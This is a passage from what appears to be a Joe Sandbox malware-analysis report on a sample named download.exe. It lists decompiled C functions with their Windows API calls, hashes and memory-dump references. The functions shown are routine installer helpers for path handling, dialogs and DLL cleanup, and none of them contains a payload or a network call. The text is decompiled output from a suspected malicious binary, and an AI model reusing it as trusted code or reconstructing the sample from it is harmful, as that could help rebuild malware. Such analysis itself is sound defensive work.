                                                      • Instruction ID: 24807b9fc88fe5fbc2e72c1c6e729af153b5b07cedbd852725a961613b6e70ef
                                                      • Opcode Fuzzy Hash: 5f074f6faf701013ce45bc378f4b03b5d4ee46098f1275575472d42f1ef86f4b
                                                      • Instruction Fuzzy Hash: 99110A776045282BEB01657D9C41EAF3288DB81378F254637FA26F72D1E978CC1246E8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00405915(CHAR* _a4) {
                                                      				CHAR* _t7;
                                                      
                                                      				_t7 = _a4;
                                                      				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                      					lstrcatA(_t7, 0x40a014);
                                                      				}
                                                      				return _t7;
                                                      			}





                                                      APIs
                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031D6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 0040591B
                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031D6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 00405924
                                                      • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405935
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405915
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrcatlstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 2659869361-3355392842
                                                      • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                      • Instruction ID: da490e60620d11e3c07f2fcccd6c796fdaa9f48d202f5171465a07f32f6e55b9
                                                      • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                      • Instruction Fuzzy Hash: B5D0A9A2201E30BED20227169C09ECB2A08CF2231AB05043BF240B61A1CA7C4D428BFE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004059AE(CHAR* _a4) {
                                                      				CHAR* _t5;
                                                      				char* _t7;
                                                      				CHAR* _t9;
                                                      				char _t10;
                                                      				CHAR* _t11;
                                                      				void* _t13;
                                                      
                                                      				_t11 = _a4;
                                                      				_t9 = CharNextA(_t11);
                                                      				_t5 = CharNextA(_t9);
                                                      				_t10 =  *_t11;
                                                      				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
                                                      					if(_t10 != 0x5c || _t11[1] != _t10) {
                                                      						L10:
                                                      						return 0;
                                                      					} else {
                                                      						_t13 = 2;
                                                      						while(1) {
                                                      							_t13 = _t13 - 1;
                                                      							_t7 = E00405940(_t5, 0x5c);
                                                      							if( *_t7 == 0) {
                                                      								goto L10;
                                                      							}
                                                      							_t5 = _t7 + 1;
                                                      							if(_t13 != 0) {
                                                      								continue;
                                                      							}
                                                      							return _t5;
                                                      						}
                                                      						goto L10;
                                                      					}
                                                      				} else {
                                                      					return CharNextA(_t5);
                                                      				}
                                                      			}










                                                      APIs
                                                      • CharNextA.USER32(?,?,Forgngeliges.rea,?,00405A1A,Forgngeliges.rea,Forgngeliges.rea,75A63410,?,C:\Users\user\AppData\Local\Temp\,00405765,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059BC
                                                      • CharNextA.USER32(00000000), ref: 004059C1
                                                      • CharNextA.USER32(00000000), ref: 004059D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CharNext
                                                      • String ID: Forgngeliges.rea
                                                      • API String ID: 3213498283-2553225184
                                                      • Opcode ID: 6ae5a98c75981dc822015e60cfe3a73e92d8e62117e7577616a1c134a98ac786
                                                      • Instruction ID: 53b5fd27e09cdb27f7d5e0d280f650891fab3cf45ffc187ddecf7516587659fd
                                                      • Opcode Fuzzy Hash: 6ae5a98c75981dc822015e60cfe3a73e92d8e62117e7577616a1c134a98ac786
                                                      • Instruction Fuzzy Hash: D4F0F6D1908F50EAFB32A6244C54B776B89CB55370F14457BD680772C1C27C4C409FAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00402CFF(intOrPtr _a4) {
                                                      				long _t2;
                                                      				struct HWND__* _t3;
                                                      				struct HWND__* _t6;
                                                      
                                                      				if(_a4 == 0) {
                                                      					__eflags =  *0x7960f8; // 0x0
                                                      					if(__eflags == 0) {
                                                      						_t2 = GetTickCount();
                                                      						__eflags = _t2 -  *0x7a2f50;
                                                      						if(_t2 >  *0x7a2f50) {
                                                      							_t3 = CreateDialogParamA( *0x7a2f40, 0x6f, 0, E00402C7C, 0);
                                                      							 *0x7960f8 = _t3;
                                                      							return ShowWindow(_t3, 5);
                                                      						}
                                                      						return _t2;
                                                      					} else {
                                                      						return E00406351(0);
                                                      					}
                                                      				} else {
                                                      					_t6 =  *0x7960f8; // 0x0
                                                      					if(_t6 != 0) {
                                                      						_t6 = DestroyWindow(_t6);
                                                      					}
                                                      					 *0x7960f8 = 0;
                                                      					return _t6;
                                                      				}
                                                      			}







                                                      APIs
                                                      • DestroyWindow.USER32(00000000,00000000,00402EDF,00000001), ref: 00402D12
                                                      • GetTickCount.KERNEL32 ref: 00402D30
                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                      • String ID:
                                                      • API String ID: 2102729457-0
                                                      • Opcode ID: 87f9a02f322897d0e4f948bf7da259dfca77796329a29cb391b18909f99ca198
                                                      • Instruction ID: b66414e99a5f690dcfe7c27c209bc19b2a06c79591cef1c7d36985daa8eb92e7
                                                      • Opcode Fuzzy Hash: 87f9a02f322897d0e4f948bf7da259dfca77796329a29cb391b18909f99ca198
                                                      • Instruction Fuzzy Hash: D6F05E30401621EBC6116B68FFCEE8F7B74AB45B02712457BF158B11E4DA7C48868B9C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 89%
                                                      			E00405018(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                      				int _t15;
                                                      				long _t16;
                                                      
                                                      				_t15 = _a8;
                                                      				if(_t15 != 0x102) {
                                                      					if(_t15 != 0x200) {
                                                      						_t16 = _a16;
                                                      						L7:
                                                      						if(_t15 == 0x419 &&  *0x79f52c != _t16) {
                                                      							_push(_t16);
                                                      							_push(6);
                                                      							 *0x79f52c = _t16;
                                                      							E004049EF();
                                                      						}
                                                      						L11:
                                                      						return CallWindowProcA( *0x79f534, _a4, _t15, _a12, _t16);
                                                      					}
                                                      					if(IsWindowVisible(_a4) == 0) {
                                                      						L10:
                                                      						_t16 = _a16;
                                                      						goto L11;
                                                      					}
                                                      					_t16 = E0040496F(_a4, 1);
                                                      					_t15 = 0x419;
                                                      					goto L7;
                                                      				}
                                                      				if(_a12 != 0x20) {
                                                      					goto L10;
                                                      				}
                                                      				E00404068(0x413);
                                                      				return 0;
                                                      			}






                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00405047
                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 00405098
                                                        • Part of subcall function 00404068: SendMessageA.USER32(00010408,00000000,00000000,00000000), ref: 0040407A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: d6227ddab35ba9883f4bf3de8d352398880cea24f9ab2b0966d31f7a69b3ea3c
                                                      • Instruction ID: fa8f59a087aa50fe202e55d5174182462002e51d1c5a0d53021f2a5da998cc86
                                                      • Opcode Fuzzy Hash: d6227ddab35ba9883f4bf3de8d352398880cea24f9ab2b0966d31f7a69b3ea3c
                                                      • Instruction Fuzzy Hash: 99012171100608AFDF215F21DD85EAF3625EB84764F244137FA41B61D1C77A8C52DEAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00403716() {
                                                      				void* _t2;
                                                      				void* _t3;
                                                      				void* _t6;
                                                      				void* _t8;
                                                      
                                                      				_t8 =  *0x79e504; // 0xb07790
                                                      				_t3 = E004036FB(_t2, 0);
                                                      				if(_t8 != 0) {
                                                      					do {
                                                      						_t6 = _t8;
                                                      						_t8 =  *_t8;
                                                      						_t1 = _t6 + 8; // 0x706b0000
                                                      						FreeLibrary( *_t1);
                                                      						_t3 = GlobalFree(_t6);
                                                      					} while (_t8 != 0);
                                                      				}
                                                      				 *0x79e504 =  *0x79e504 & 0x00000000;
                                                      				return _t3;
                                                      			}








                                                      APIs
                                                      • FreeLibrary.KERNEL32(706B0000,75A63410,00000000,C:\Users\user\AppData\Local\Temp\,004036EE,00403508,?,?,00000006,00000008,0000000A), ref: 00403730
                                                      • GlobalFree.KERNEL32(00B07790), ref: 00403737
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403716
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Free$GlobalLibrary
                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 1100898210-3355392842
                                                      • Opcode ID: 4d9750b91f9c818690002108793fa6d5ed1a6d42b958517d28de6e516f48fa46
                                                      • Instruction ID: e3cd8cf2938ee13ec1fefa9c4a9681649e8a36576cb89bbd23f75385d37883fe
                                                      • Opcode Fuzzy Hash: 4d9750b91f9c818690002108793fa6d5ed1a6d42b958517d28de6e516f48fa46
                                                      • Instruction Fuzzy Hash: AEE0C2334011209FC6219F04FE0872A7778AF49B23F06842BF8807B36087781C534BC8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040595C(char* _a4) {
                                                      				char* _t3;
                                                      				char* _t5;
                                                      
                                                      				_t5 = _a4;
                                                      				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                      				while( *_t3 != 0x5c) {
                                                      					_t3 = CharPrevA(_t5, _t3);
                                                      					if(_t3 > _t5) {
                                                      						continue;
                                                      					}
                                                      					break;
                                                      				}
                                                      				 *_t3 =  *_t3 & 0x00000000;
                                                      				return  &(_t3[1]);
                                                      			}






                                                      APIs
                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\download.exe,C:\Users\user\Desktop\download.exe,80000000,00000003), ref: 00405962
                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\download.exe,C:\Users\user\Desktop\download.exe,80000000,00000003), ref: 00405970
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrlen
                                                      • String ID: C:\Users\user\Desktop
                                                      • API String ID: 2709904686-3370423016
                                                      • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                      • Instruction ID: 1bd18926039b2b13e1a5e2b6749e0a20dca9854900914240940d95a6582504e3
                                                      • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                      • Instruction Fuzzy Hash: BAD0C9A2409DB0AEE71363249C04B9F6A88DF26715F0904B7E181F61A1C6BC4D828BAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E706B10E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				char* _t17;
                                                      				char _t19;
                                                      				void* _t20;
                                                      				void* _t24;
                                                      				void* _t27;
                                                      				void* _t31;
                                                      				void* _t37;
                                                      				void* _t39;
                                                      				void* _t40;
                                                      				signed int _t43;
                                                      				void* _t52;
                                                      				char* _t53;
                                                      				char* _t55;
                                                      				void* _t56;
                                                      				void* _t58;
                                                      
                                                      				 *0x706b405c = _a8;
                                                      				 *0x706b4060 = _a16;
                                                      				 *0x706b4064 = _a12;
                                                      				 *((intOrPtr*)(_a20 + 0xc))( *0x706b4038, E706B1556, _t52);
                                                      				_t43 =  *0x706b405c +  *0x706b405c * 4 << 2;
                                                      				_t17 = E706B123B();
                                                      				_a8 = _t17;
                                                      				_t53 = _t17;
                                                      				if( *_t17 == 0) {
                                                      					L16:
                                                      					return GlobalFree(_a8);
                                                      				} else {
                                                      					do {
                                                      						_t19 =  *_t53;
                                                      						_t55 = _t53 + 1;
                                                      						_t58 = _t19 - 0x6c;
                                                      						if(_t58 > 0) {
                                                      							_t20 = _t19 - 0x70;
                                                      							if(_t20 == 0) {
                                                      								L12:
                                                      								_t53 = _t55 + 1;
                                                      								_t24 = E706B1266(E706B12AD( *_t55 - 0x30));
                                                      								L13:
                                                      								GlobalFree(_t24);
                                                      								goto L14;
                                                      							}
                                                      							_t27 = _t20;
                                                      							if(_t27 == 0) {
                                                      								L10:
                                                      								_t53 = _t55 + 1;
                                                      								_t24 = E706B12D1( *_t55 - 0x30, E706B123B());
                                                      								goto L13;
                                                      							}
                                                      							L7:
                                                      							if(_t27 == 1) {
                                                      								_t31 = GlobalAlloc(0x40, _t43 + 4);
                                                      								 *_t31 =  *0x706b4030;
                                                      								 *0x706b4030 = _t31;
                                                      								E706B1508(_t31 + 4,  *0x706b4064, _t43);
                                                      								_t56 = _t56 + 0xc;
                                                      							}
                                                      							goto L14;
                                                      						}
                                                      						if(_t58 == 0) {
                                                      							L17:
                                                      							_t34 =  *0x706b4030;
                                                      							if( *0x706b4030 != 0) {
                                                      								E706B1508( *0x706b4064, _t34 + 4, _t43);
                                                      								_t37 =  *0x706b4030;
                                                      								_t56 = _t56 + 0xc;
                                                      								GlobalFree(_t37);
                                                      								 *0x706b4030 =  *_t37;
                                                      							}
                                                      							goto L14;
                                                      						}
                                                      						_t39 = _t19 - 0x4c;
                                                      						if(_t39 == 0) {
                                                      							goto L17;
                                                      						}
                                                      						_t40 = _t39 - 4;
                                                      						if(_t40 == 0) {
                                                      							 *_t55 =  *_t55 + 0xa;
                                                      							goto L12;
                                                      						}
                                                      						_t27 = _t40;
                                                      						if(_t27 == 0) {
                                                      							 *_t55 =  *_t55 + 0xa;
                                                      							goto L10;
                                                      						}
                                                      						goto L7;
                                                      						L14:
                                                      					} while ( *_t53 != 0);
                                                      					goto L16;
                                                      				}
                                                      			}



















                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 706B115B
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B11B4
                                                      • GlobalFree.KERNEL32(?), ref: 706B11C7
                                                      • GlobalFree.KERNEL32(?), ref: 706B11F5
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc
                                                      • String ID:
                                                      • API String ID: 1780285237-0
                                                      • Opcode ID: f8eaf36f466c60d9859b0a8dd8160b02c17f79b8b7a2f9b7a39cc743f041c6b4
                                                      • Instruction ID: c47355b2851a1ac191e3fa54c06ca742ee90832e53898123df1b6db0e8fbf6c6
                                                      • Opcode Fuzzy Hash: f8eaf36f466c60d9859b0a8dd8160b02c17f79b8b7a2f9b7a39cc743f041c6b4
                                                      • Instruction Fuzzy Hash: 1931CFF2504204BFD711AF69DD7DB6E7FFAEB05240BB40219EA46CA3A0D6789940CB24
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00405A7B(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                      				int _v8;
                                                      				int _t12;
                                                      				int _t14;
                                                      				int _t15;
                                                      				CHAR* _t17;
                                                      				CHAR* _t27;
                                                      
                                                      				_t12 = lstrlenA(_a8);
                                                      				_t27 = _a4;
                                                      				_v8 = _t12;
                                                      				while(lstrlenA(_t27) >= _v8) {
                                                      					_t14 = _v8;
                                                      					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                      					_t15 = lstrcmpiA(_t27, _a8);
                                                      					_t27[_v8] =  *(_t14 + _t27);
                                                      					if(_t15 == 0) {
                                                      						_t17 = _t27;
                                                      					} else {
                                                      						_t27 = CharNextA(_t27);
                                                      						continue;
                                                      					}
                                                      					L5:
                                                      					return _t17;
                                                      				}
                                                      				_t17 = 0;
                                                      				goto L5;
                                                      			}










                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CD6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A8B
                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AA3
                                                      • CharNextA.USER32(00000000,?,00000000,00405CD6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AB4
                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405CD6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ABD
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                      • Instruction ID: bbf0fe82adfec40a5435aad4fbaff8462ffeb4f6e62521b4b159965ff53dba99
                                                      • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                      • Instruction Fuzzy Hash: 9BF0C232215914BFC702DBA8CD40D9EBBA8EF46350B2540B9E840F7211D634DE019FA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%